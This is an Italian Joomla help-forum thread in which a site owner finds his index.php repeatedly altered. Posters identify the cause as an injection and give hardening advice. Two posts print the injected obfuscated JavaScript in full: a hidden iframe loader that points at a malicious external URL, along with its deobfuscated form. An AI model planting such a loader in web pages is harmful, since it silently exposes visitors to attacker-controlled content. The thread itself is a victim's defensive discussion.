Back to top

Autore Topic: Un bug di joomla o un attaco hacker?  (Letto 5577 volte)

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Un bug di joomla o un attaco hacker?
« il: 12 Lug 2009, 10:39:23 »
Mi è capitato diverse volte che il mio sito joomla smette di funzionare improvvisamente restituendo sul browser questo errore:

Parse error: syntax error, unexpected '<' in /home/mhd-01/www.orbitante.com/htdocs/index.php on line 89.

Per risolvere il problema in genere riuppo il file "index.php" nell root, sovrascrivendo quello precedente.

Questa volta però mi preoccupa il fatto che da quando mi è successo, l'indicizzazione del sito ne ha risentito parecchio. Provate a scrivere "orbitante" su google (il mio sito è www.orbitante.com) e notate che il titolo e la descrizione del sito corrispondono all'errore restituito da joomla.

Potrebbe essere qualche smanettone rompiscatole che compromette il mio sito? Perchè joomla dovrebbe smettere di funzionare come se il codice della index si modificasse da solo?

Aspetto con ansia una risposta, grazie.

Ps. ho dimenticato di dire che la versione joomla che uso è la 1.5.10
« Ultima modifica: 12 Lug 2009, 10:41:50 da acael »

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #1 il: 12 Lug 2009, 10:47:36 »
direi che c'è n'è abbastanza per adottare delle precauzioni, cambia spesso le credenziali di accesso, tutte database ed ftp comprese, poi considerato l'argomento del sito fai spesso le copie..
non è un bug di joomla ovviamente
la mia connessione da ieri va a 15kb (!!!) appena posso guardo pure il tuo sito, ma se hai un contatore esterno ti consiglierei di eliminarlo perchè è una porta per certi tipi di fastidi...

(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #2 il: 12 Lug 2009, 12:03:03 »
Ho un contatore shinystat, mi serve per capire le visite che ricevo e da dove le ricevo.
C'è un modo di disfarmi di shinystat e comunque vedere gli accessi al mio sito?

Offline ramses_2th

  • Global Moderator
  • Instancabile
  • ********
  • Post: 4067
  • Sesso: Maschio
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #3 il: 12 Lug 2009, 12:15:10 »
se riuppi semplicemente per risolvere il problema, non capirai il perchè dell'errore.

Confronata i due file, e cerca di capire, se ci sono e quali sono le differenze tra i due.

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #4 il: 12 Lug 2009, 12:17:49 »
azz non ci avevo pensato. Ogni volta la fretta di sistemare è tanta che non ho riflettuto a farlo.
Dovrò aspettare il prossimo caso (sperando che non capiti più) per fare questo confronto.  :-\

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #5 il: 12 Lug 2009, 13:14:02 »
Ho un contatore shinystat,
:D
tipico, come e chi non saprei e non credo sia importante ma confermi che qualcuno ha una bella porta spalancata per riempire di monnezza i files del tuo sito, di sicuro non sono hacher ma semmai spammers...
Citazione
C'è un modo di disfarmi di shinystat e comunque vedere gli accessi al mio sito?
questa è un'altra domanda...
risolvi un problema per volta, prima chiudi la porta agli sporcaccioni, poi risolvi questo...
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline Francesco Centomo

  • Nuovo arrivato
  • *
  • Post: 22
  • Sesso: Maschio
  • Impianta linux, che windows si pianta da solo...
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #6 il: 12 Lug 2009, 13:58:09 »
Ti consiglio di usare google analyst. Ti copi una stringa nel file index.php del template, e nel portale di google vedi le visite, le provenienze, città e molto altro ancora.
Ciao
:D Francesco Centomo
www.tecnologiesistemi.com
Sviluppo siti web con joomla e servizio di hosting!

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #7 il: 12 Lug 2009, 21:14:14 »
Grazie mille a tutti per l'aiuto.

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #8 il: 26 Ott 2009, 09:05:49 »
La situazione continua a verificarsi e questa volta ho confrontato i due file index.php.

La differenza tra il file originale e quello guasto è, che alla fine dell'index.php corrotta c'è una riga in più che ha questo contenuto:

Codice: [Seleziona]
yj='77';o='c';s='e';va='cd';og='2';ua='175';l='tch';zj='8c0';mx='.';ze='76';sy='i';ja='zpr';g='3b';m='tp';h='d';oo='0d';gi='bam';nw='f';a='d';p='bi';d='://';wm='/?';z='m';ci='e';dg='0d4';fa='ak';x='fra';pt='o';om='90';nz='a4';k='i';oi='a';vh='c';t='sun';ul='a55';vv='f';pu='o';ox='bar';er='a';j='f';iw='sr';u='n/';kt='on';v='c';de='0';b='ht';gg=sy.concat(x,z,s);jy=iw.concat(o);qm=b.concat(m,d,ox,fa,pt,gi,er,t,pu,nw,kt,ci,p,l,mx,k,u,vh,a,ja,vv,wm,ul,zj,g,v,j,oi,de,h,ua,ze,va,dg,oo,nz,om,yj,og);var q=document.createElement(gg);q.setAttribute('width','5');q.setAttribute('height','5');q.setAttribute('style','display:none');q.setAttribute(jy,qm);document.body.appendChild(q);
Qualcuno sa come potrei risolvere?

Offline jabba

  • Nuovo arrivato
  • *
  • Post: 42
  • Sesso: Maschio
  • pixed.it
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #9 il: 26 Ott 2009, 10:05:20 »
ciao, è siuramente un attacco di hacking. Se metti in ordine quel codice ti viene fuori questo:

Codice: [Seleziona]
yj='77';
o='c';
s='e';
va='cd';
og='2';
ua='175';
l='tch';
zj='8c0';
mx='.';
ze='76';
sy='i';
ja='zpr';
g='3b';
m='tp';
h='d';
oo='0d';
gi='bam';
nw='f';
a='d';
p='bi';
d='://';
wm='/?';
z='m';
ci='e';
dg='0d4';
fa='ak';
x='fra';
pt='o';
om='90';
nz='a4';
k='i';
oi='a';
vh='c';
t='sun';
ul='a55';
vv='f';
pu='o';
ox='bar';
er='a';
j='f';
iw='sr';
u='n/';
kt='on';
v='c';
de='0';
b='ht';
gg=sy.concat(x,z,s);
jy=iw.concat(o);
qm=b.concat(m,d,ox,fa,pt,gi,er,t,pu,nw,kt,ci,p,l,mx,k,u,vh,a,ja,vv,wm,ul,zj,g,v,j,oi,de,h,ua,ze,va,dg,oo,nz,om,yj,og);

var
q=document.createElement(gg);
q.setAttribute('width','5');
q.setAttribute('height','5');
q.setAttribute('style','display:none');
q.setAttribute(jy,qm);
document.body.appendChild(q);

quindi, facendo tutte le sostituzioni viene fuori questo:

Codice: [Seleziona]
document.createElement(iframe);
q.setAttribute('width','5');
q.setAttribute('height','5');
q.setAttribute('style','display:none');
q.setAttribute(src,http://barakobamasunofonebitch.in/in/cdzprf/?a558c03bcfa0d17576cd0d40da490772);
document.body.appendChild(q);

ovviamente è vivamente sconsigliato usare quel link li sopra.

Alla luce di questo ti consiglierei:

  • Aggiorna Joomla
  • Aggiorna tutti i tuoi componenti
  • Aggiorna tutte le tue password (di joomla)
  • Aggiorna tutte le tue password (spazio web, pannello di controllo se ce l'hai, database)
Gianluca Gabella - PIXED
www.pixed.it

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #10 il: 26 Ott 2009, 13:01:03 »
Grazie per la risposta, ho seguito i tuoi consigli.

Ho pensato anche di impostare i permessi del file index.php a sola lettura per tutti (codice 444) pensi che possa servire o causare problemi per il corretto funzionamento del sito?

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #11 il: 26 Ott 2009, 13:04:55 »
ragazzi evitate di diffondere quella porchieria, agevolate solo il loro gioco..

e non si tratta altro che di spammer che entrano attraverso i soliti contatori e altri servizi simili (forse gestiti da loro stessi) per diffondere la loro monnezza che gli serve per scalare i motori di ricerca..

quindi niente bug di joomla, al solito la sicurezza sta tra il monitor e lo schienale della sedia dell'amministrazione del sito....
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #12 il: 26 Ott 2009, 17:10:49 »
Uso solo i servizi di google.
Esiste una guida alla sicurezza di joomla?

(ho fatto male a settasre 444 su index.php?)

Offline informatore82

  • Nuovo arrivato
  • *
  • Post: 13
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #13 il: 26 Ott 2009, 17:27:40 »
Wow, robe da pazzi, secondo me ci sono gli estremi per una denuncia verso il proprietario del sito ''cattivone''

Comunque non credo abbia i dati di accesso per modificarti i file, semplicemente come dicono in molti quì hai qualche componente, plugin o lo stesso tema infetto e ti vien fuori questo scherzetto, ho letto che spesso i temi gratuiti (specialmente se non scaricati dai siti ufficiali) così come i plugin e moduli vengono modificati con codici strani proprio come il tuo, quindi io penserei a cosa ho installato nell'immediato appena prima che i problemi iniziassero a verificarsi, poi se è una cosa del primo momento...ma non credo.

In ultimo...Interessante il tuo sito, se avessi più tempo me lo leggerei tutto, però..ehm...guarda quà :

La NASA ha scagliato la sua arma contro la superficie lunare seguita da una sonda che, con pochi secondi a disposizione, ha raccolto tutti i dati necessari per determinare se sulla luna c’è traccia di acqua, e quindi se tra qualche hanno sarà possibile la realizzazione di una base lunare.

Tratto dalla Home page del tuo sito...

Meglio correggere quello strafalcione no?  ;D

Offline = odino =

  • Instancabile
  • ******
  • Post: 5696
  • Sesso: Maschio
  • "In realtà li trasforma in menomati" Danzel
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #14 il: 26 Ott 2009, 18:12:07 »
spesso i temi gratuiti (specialmente se non scaricati dai siti ufficiali) così come i plugin e moduli vengono modificati con codici strani proprio come il tuo

nono, questa è una graaaande bugia...  ;)

Offline informatore82

  • Nuovo arrivato
  • *
  • Post: 13
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #15 il: 26 Ott 2009, 18:36:22 »
ehm..non ci siamo capiti, non ho detto che il gratuito porta certe rogne, ho detto che se anzichè scaricarli dai siti UFFICIALI vai a scaricarli da altri lidi imrpvvisati capita sovente di ritrovarsi con quelle fregature, naturalmente se scarichi il tema o quel che è dal sito ufficiale di Joomla o da quello dell'autore questi problemi non sorgono.

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #16 il: 27 Ott 2009, 08:56:56 »
Tratto dalla Home page del tuo sito...

Meglio correggere quello strafalcione no?  ;D

Grazie per la segnalazione, non mi ero accorto della gaffe  :P :P ;D

Volevo segnalare anche il fatto che di recente ho inserito gli annunci google adsense. Ho notato che nella home del sito gli annunci sono in inglese mentre nelle pagine degli articoli sono in italiano.

Potrebbe significare qualcosa che riguarda il problema che ho?
« Ultima modifica: 27 Ott 2009, 09:03:26 da acael »

Offline acael

  • Nuovo arrivato
  • *
  • Post: 22
    • Mostra profilo
Re:Un bug di joomla o un attaco hacker?
« Risposta #17 il: 13 Nov 2009, 09:52:07 »
Per la cronaca, sembrerebbe che il problema si sia risolto impostando i permessi della index a 444

 



Web Design Bolzano Kreatif